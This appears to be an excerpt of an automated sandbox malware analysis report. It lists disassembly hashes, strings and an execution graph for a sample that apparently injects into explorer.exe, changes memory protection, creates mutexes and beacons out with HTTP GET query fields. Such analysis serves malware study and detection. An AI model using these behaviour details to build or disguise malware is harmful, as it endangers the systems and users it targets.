                                                                                                                                            • Opcode ID: 4c28e6935d5040097176a9bd22e7b2cf8add1702ffe9d715f3356e0c93c7ed6c
                                                                                                                                            • Instruction ID: 9fc9ce8db362bb14af730645127961ab1a61b1f41a07d80e051aabfe30dec6b2
                                                                                                                                            • Opcode Fuzzy Hash: 4c28e6935d5040097176a9bd22e7b2cf8add1702ffe9d715f3356e0c93c7ed6c
                                                                                                                                            • Instruction Fuzzy Hash: 2A900271B0940802D25071984424746400597D0302F95C121A0024664DC7558B5577A2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c4948373b5b3816d28f57194c52da072380425c18932e333e4e7a989e80bda66
                                                                                                                                            • Instruction ID: 5101057553185d2d888d8351fca731201c50a28345b6b23546a375bbc7d33814
                                                                                                                                            • Opcode Fuzzy Hash: c4948373b5b3816d28f57194c52da072380425c18932e333e4e7a989e80bda66
                                                                                                                                            • Instruction Fuzzy Hash: BA90027170540802D20471984814686400597D0302F95C121A6024665ED6658A917232
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: bc879dd8b85b44dbb070ee8ec07c48c7abde1d893cc21935148fc12179b9506a
                                                                                                                                            • Instruction ID: d796971ba3fef85ec85e3d1a2baf3d408a96245ea18c46387b4a99991b537878
                                                                                                                                            • Opcode Fuzzy Hash: bc879dd8b85b44dbb070ee8ec07c48c7abde1d893cc21935148fc12179b9506a
                                                                                                                                            • Instruction Fuzzy Hash: C3900265725400020245B598061450B4445A7D63523D5C125F14165A0CC6218A655322
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7dd12cb57ba59367a366285b0c8f894e1ea84ba897f32a26bff4c94c309e4fb0
                                                                                                                                            • Instruction ID: a85e00cb0707a7f7835b51da29c6c34036c0063aae250d03417930142d2cef92
                                                                                                                                            • Opcode Fuzzy Hash: 7dd12cb57ba59367a366285b0c8f894e1ea84ba897f32a26bff4c94c309e4fb0
                                                                                                                                            • Instruction Fuzzy Hash: F49002E1705540924600B2988414B0A850597E0202B95C126E1054570CC5258A519236
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: bae399ea6a45f35bdc61d9c5f6c62f270e66f54a07db72aec9a31ccaecb7b40a
                                                                                                                                            • Instruction ID: 963abcb50acb3574dbf692fb67aed31779cdf965cbc5afbe3c97a2c459d7d359
                                                                                                                                            • Opcode Fuzzy Hash: bae399ea6a45f35bdc61d9c5f6c62f270e66f54a07db72aec9a31ccaecb7b40a
                                                                                                                                            • Instruction Fuzzy Hash: BB90026170944442D20075985418A06400597D0206F95D121A10645A5DC6358A51A232
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b314edc81ec757547ccd287d303f0feebc9ebfb12b5e3a28b87113689fa7a6b1
                                                                                                                                            • Instruction ID: 0f83ac576cc64f4e8cf4be4ed07dcf827a34ced4f481fb2163d7575b21c9af6d
                                                                                                                                            • Opcode Fuzzy Hash: b314edc81ec757547ccd287d303f0feebc9ebfb12b5e3a28b87113689fa7a6b1
                                                                                                                                            • Instruction Fuzzy Hash: EC90027174540402D241719844146064009A7D0242FD5C122A0424564EC6558B56AB62
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c8d8d64ac51527e7ce7ec36dff44f1f3d166ebfcf12ff60dfc1ce50e7e6f03ed
                                                                                                                                            • Instruction ID: 5a205d2030907bdfc8c39d333d9ebf2f20f56a98033b07d724d8df6807d3a0d9
                                                                                                                                            • Opcode Fuzzy Hash: c8d8d64ac51527e7ce7ec36dff44f1f3d166ebfcf12ff60dfc1ce50e7e6f03ed
                                                                                                                                            • Instruction Fuzzy Hash: F090027170540842D20071984414B46400597E0302F95C126A0124664DC615CA517622
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 792ab5dc194d913eae7a52599d3ca73049ca84ed88cb11fd4d8996a542a5f61a
                                                                                                                                            • Instruction ID: 3c0ea9e120e47c5ca948a30af9c6b3c27493c2620e2ae937a064abc4d955a982
                                                                                                                                            • Opcode Fuzzy Hash: 792ab5dc194d913eae7a52599d3ca73049ca84ed88cb11fd4d8996a542a5f61a
                                                                                                                                            • Instruction Fuzzy Hash: 7790027170540403D20071985518707400597D0202F95D521A0424568DD6568A516222
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ee009907755fc34537981ee584c9995d9cba3a76e0e8609aef204a3841a70500
                                                                                                                                            • Instruction ID: e7ccc13b2f9653be676b74b90d4e4d31a5b3b5b0582cf5d4a4b60fa44da0eb42
                                                                                                                                            • Opcode Fuzzy Hash: ee009907755fc34537981ee584c9995d9cba3a76e0e8609aef204a3841a70500
                                                                                                                                            • Instruction Fuzzy Hash: 8E900261B0940402D24071985428706401597D0202F95D121A0024564DC6598B5567A2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: beca0a98c9df1e68a90f8b5e6785278cdac232594c07f7e8cf4f26f935cae887
                                                                                                                                            • Instruction ID: beb68f15363cfbaa56713fc7cde2fba03cdc405f6277f07eee633cecb785661b
                                                                                                                                            • Opcode Fuzzy Hash: beca0a98c9df1e68a90f8b5e6785278cdac232594c07f7e8cf4f26f935cae887
                                                                                                                                            • Instruction Fuzzy Hash: 189002A171540042D20471984414706404597E1202F95C122A2154564CC5298E615226
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
Strings
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017C46FC
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017C4725
• Execute=1, xrefs: 017C4713
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017C4655
• ExecuteOptions, xrefs: 017C46A0
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017C4742
• CLIENT(ntdll): Processing section info %ws..., xrefs: 017C4787
                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                            • String ID: +$-$0$0
                                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                            • Instruction ID: 4c7194c1d456380d0e5ead6cd51b3ded6ceb8bc71830c12e651f4b397a3d3cd4
                                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                            • Instruction Fuzzy Hash: D981B470E452499EEF25CE6CF891FFEFBB1AF85320F18425AD851A7291C7349848CB91
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                                            • Opcode ID: 8f7c37b250b1cd22dd6ae60055f10c989e93271415ef01d0045e324cae30061e
                                                                                                                                            • Instruction ID: 429ad951548cb701bb3780f053ecedfd6df0a9e1147fee36faf21c3875ddd972
                                                                                                                                            • Opcode Fuzzy Hash: 8f7c37b250b1cd22dd6ae60055f10c989e93271415ef01d0045e324cae30061e
                                                                                                                                            • Instruction Fuzzy Hash: D221C47AA0011DABDB11DF79DC48AFEBBF9EF54744F040116E905E3240E770EA058BA0
                                                                                                                                            Strings
                                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017C02BD
                                                                                                                                            • RTL: Re-Waiting, xrefs: 017C031E
                                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017C02E7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                            • API String ID: 0-2474120054
                                                                                                                                            • Opcode ID: 8db27ec4f46a90249cbc27c661f3ebc431617ef39db9fe450b54e866890aea80
                                                                                                                                            • Instruction ID: 063fd0e2aa454e1f196c11349cab50a23189f8f61b19a81e8687da3cef7fc3cd
                                                                                                                                            • Opcode Fuzzy Hash: 8db27ec4f46a90249cbc27c661f3ebc431617ef39db9fe450b54e866890aea80
                                                                                                                                            • Instruction Fuzzy Hash: D6E19B34608741DFDB25CF28C984B2AFBE1AB88714F140A6DF5A5CB2E1D774D945CB82
                                                                                                                                            Strings
                                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 017C7B7F
                                                                                                                                            • RTL: Re-Waiting, xrefs: 017C7BAC
                                                                                                                                            • RTL: Resource at %p, xrefs: 017C7B8E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                            • API String ID: 0-871070163
                                                                                                                                            • Opcode ID: 8da1b0ceb66b5c665e454848f95631200ad617ac7b89188b0e4f918e012735c0
                                                                                                                                            • Instruction ID: 52bee0a8b113f8f93bde69bacdaefc22ed02843a41e568eb44b680ee27f2b4d3
                                                                                                                                            • Opcode Fuzzy Hash: 8da1b0ceb66b5c665e454848f95631200ad617ac7b89188b0e4f918e012735c0
                                                                                                                                            • Instruction Fuzzy Hash: 5841EF353447029FDB25EE29C840B6AF7E5EF98720F000A1DFA5ADB680DB31E9058B91
                                                                                                                                            APIs
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C728C
                                                                                                                                            Strings
                                                                                                                                            • RTL: Re-Waiting, xrefs: 017C72C1
                                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017C7294
                                                                                                                                            • RTL: Resource at %p, xrefs: 017C72A3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                                            • Opcode ID: ba666591a50be3dd431084d67fc7abb87601fc8e2e80f9dc8cc5cab39a73a7cd
                                                                                                                                            • Instruction ID: 668dbef2925aa31adf31b0a247efe92ca5cc607ffd578cc5c3cb2ffc8d473363
                                                                                                                                            • Opcode Fuzzy Hash: ba666591a50be3dd431084d67fc7abb87601fc8e2e80f9dc8cc5cab39a73a7cd
                                                                                                                                            • Instruction Fuzzy Hash: 55410231744606ABD724DE29CC42B6AF7B6FB94B10F14061DF955EB240DB30F8468BD1
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                            • Opcode ID: a1635ad7e15fe768dccf8f7ef1a68d2fc59ebf26c6caa463fb4bff177139b60b
                                                                                                                                            • Instruction ID: 4ca09f22ce961bfe357286ff336665ce48539deee557fbbe7a0ef5c9f6dda216
                                                                                                                                            • Opcode Fuzzy Hash: a1635ad7e15fe768dccf8f7ef1a68d2fc59ebf26c6caa463fb4bff177139b60b
                                                                                                                                            • Instruction Fuzzy Hash: 7931A472A0022D9FDB61DF2DCC44BEEB7F9EB44710F454556E949E3280EB709A448BA0
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                            • String ID: +$-
                                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                            • Instruction ID: 6daf029417db4812a51f1a3664917e2e9d57fe2c690d889fa1fb5d8afc1da3c8
                                                                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                            • Instruction Fuzzy Hash: 9391C671E1020A9BEF28CF6DE8816BEFBB2EF44720F54451AE955E72C0D73089498F11
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $$@
                                                                                                                                            • API String ID: 0-1194432280
                                                                                                                                            • Opcode ID: 74ed01424ec444d5b00a30a998c391f5bf82b0360fcaea84facb5aa5da8ddf90
                                                                                                                                            • Instruction ID: ddb1d3d7299df6cf5db95c493d1b3f9be493e460dcce8e8df1d783f002dc1529
                                                                                                                                            • Opcode Fuzzy Hash: 74ed01424ec444d5b00a30a998c391f5bf82b0360fcaea84facb5aa5da8ddf90
                                                                                                                                            • Instruction Fuzzy Hash: 43811B71D012699BDB718B54CC44BEEBBB8AF48754F0041DAEA19B7640E7705E84CFA0

Execution Graph

Execution Coverage: 2.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.7%
Total number of Nodes: 444
Total number of Limit Nodes: 15
13593 10db88f2 NtProtectVirtualMemory 13591->13593 13592->13517 13593->13587 13595 10db8987 13594->13595 13598 10db89b2 13595->13598 13609 10db9622 13595->13609 13597 10db8c0c 13597->13525 13598->13597 13599 10db8ba2 13598->13599 13601 10db8ac5 13598->13601 13600 10dc4e12 NtProtectVirtualMemory 13599->13600 13608 10db8b5b 13600->13608 13613 10dc4e12 13601->13613 13603 10dc4e12 NtProtectVirtualMemory 13603->13597 13604 10db8ae3 13604->13597 13605 10db8b3d 13604->13605 13606 10dc4e12 NtProtectVirtualMemory 13604->13606 13607 10dc4e12 NtProtectVirtualMemory 13605->13607 13606->13605 13607->13608 13608->13597 13608->13603 13610 10db967a 13609->13610 13611 10dc4e12 NtProtectVirtualMemory 13610->13611 13612 10db9684 13610->13612 13611->13610 13612->13598 13617 10dc3942 13613->13617 13615 10dc4e45 NtProtectVirtualMemory 13616 10dc4e70 13615->13616 13616->13604 13618 10dc3967 13617->13618 13618->13615 13620 10dbf3c7 13619->13620 13623 10dbf232 13620->13623 13622 10dbf438 13622->13533 13624 10dbf25e 13623->13624 13627 10dbe8c2 13624->13627 13626 10dbf26b 13626->13622 13628 10dbe934 13627->13628 13629 10dbe9a6 13628->13629 13630 10dbe995 ObtainUserAgentString 13628->13630 13629->13626 13630->13629 13879 10dbf22a 13880 10dbf25e 13879->13880 13881 10dbe8c2 ObtainUserAgentString 13880->13881 13882 10dbf26b 13881->13882 13974 10dc072e 13975 10dc0788 connect 13974->13975 13976 10dc076a 13974->13976 13976->13975 13830 10dc5aa9 13831 10dc5aaf 13830->13831 13834 10dc0212 13831->13834 13833 10dc5ac7 13835 10dc0237 13834->13835 13836 10dc021b 13834->13836 13835->13833 13836->13835 13837 10dc00c2 6 API calls 13836->13837 13837->13835 13883 10db942e 13884 10db945b 13883->13884 13892 10db94c9 13883->13892 13885 10dc3232 NtCreateFile 13884->13885 13884->13892 13886 10db9496 13885->13886 13887 10db94c5 13886->13887 13888 10db9082 NtCreateFile 13886->13888 13889 10dc3232 NtCreateFile 13887->13889 13887->13892 13890 10db94b6 13888->13890 13889->13892 13890->13887 13891 10db8f52 NtCreateFile 
13890->13891 13891->13887 13808 10dc02e4 13809 10dc036f 13808->13809 13810 10dc0305 13808->13810 13810->13809 13812 10dc00c2 13810->13812 13813 10dc01f0 13812->13813 13814 10dc00cb 13812->13814 13813->13809 13814->13813 13815 10dc3f82 6 API calls 13814->13815 13815->13813 13816 10dbdce2 13818 10dbddd9 13816->13818 13817 10dbe022 13818->13817 13819 10dbd352 NtCreateFile 13818->13819 13820 10dbdf0d 13819->13820 13820->13817 13821 10dbd792 NtCreateFile 13820->13821 13821->13820 13970 10dbab66 13971 10dbab6a 13970->13971 13972 10dbacb5 CreateMutexExW 13971->13972 13973 10dbacce 13971->13973 13972->13973

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: getaddrinforecvsetsockopt
                                                                                                                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                            • API String ID: 1564272048-1117930895
                                                                                                                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                            • Instruction ID: 1663856c17f568f5ea9b0d04ff4c180689e2c8830ba723a31fa00320697e5845
                                                                                                                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                            • Instruction Fuzzy Hash: 2252CE34618A488BC758EF68C5847EAB7E1FF94300F54462ED49FC7186DE30B98ACB95

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID: `
                                                                                                                                            • API String ID: 823142352-2679148245
                                                                                                                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                            • Instruction ID: 8d6a0beff2f7e7c98947625b378c2a6e77b8a307f7b55a92c7da136a600a0d56
                                                                                                                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                            • Instruction Fuzzy Hash: 94226B70A18A499FCB89DF28C5957AAF7E1FB98300F51422EE45ED7250DF30E951CB82

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • NtProtectVirtualMemory.NTDLL ref: 10DC4E67
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2706961497-0
                                                                                                                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                            • Instruction ID: 3624a030a701b64e6e7f305cc3b1c7339486e0cefe8236bea7cbdf1fc50d3bbf
                                                                                                                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                            • Instruction Fuzzy Hash: C601B134628B884F8788EF6CD48122AB7E4FBCD314F000B3EE99AC3250EB70C5414B42

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • NtProtectVirtualMemory.NTDLL ref: 10DC4E67
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2706961497-0
                                                                                                                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                            • Instruction ID: a1a90e6c7432a7d49f0808b86e1617b57e1d50ffd05778badece566fabc0c2f8
                                                                                                                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                            • Instruction Fuzzy Hash: D401A234628B884B8748EB2C94412A6B3E5FBCE314F004B3EE9DAC3240DB71D5024B82

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • ObtainUserAgentString.URLMON ref: 10DBE9A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AgentObtainStringUser
                                                                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                            • API String ID: 2681117516-319646191
                                                                                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                            • Instruction ID: 5d8baab80a8c0bb1839adc16f04cb62d9f0d260b7f380cc85067051aca0c09bf
                                                                                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                            • Instruction Fuzzy Hash: 6C31B131614A4D8BCB44EFA8C8857EDB7E1FB98314F40422EE45ED7280DE749645CB99

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • ObtainUserAgentString.URLMON ref: 10DBE9A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AgentObtainStringUser
                                                                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                            • API String ID: 2681117516-319646191
                                                                                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                            • Instruction ID: 12c1d87df9f28b627b2e439860d402ddcf696a0e0e36193b0719139d837b8e42
                                                                                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                            • Instruction Fuzzy Hash: EA21C130614A4D8BCB44EFA8C8857EDBBA1FF58304F40422EE45AD7280EE7496458B99

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182784907.0000000010CE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10CE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10ce0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutex
                                                                                                                                            • String ID: .dll$el32$kern
                                                                                                                                            • API String ID: 1964310414-1222553051
                                                                                                                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
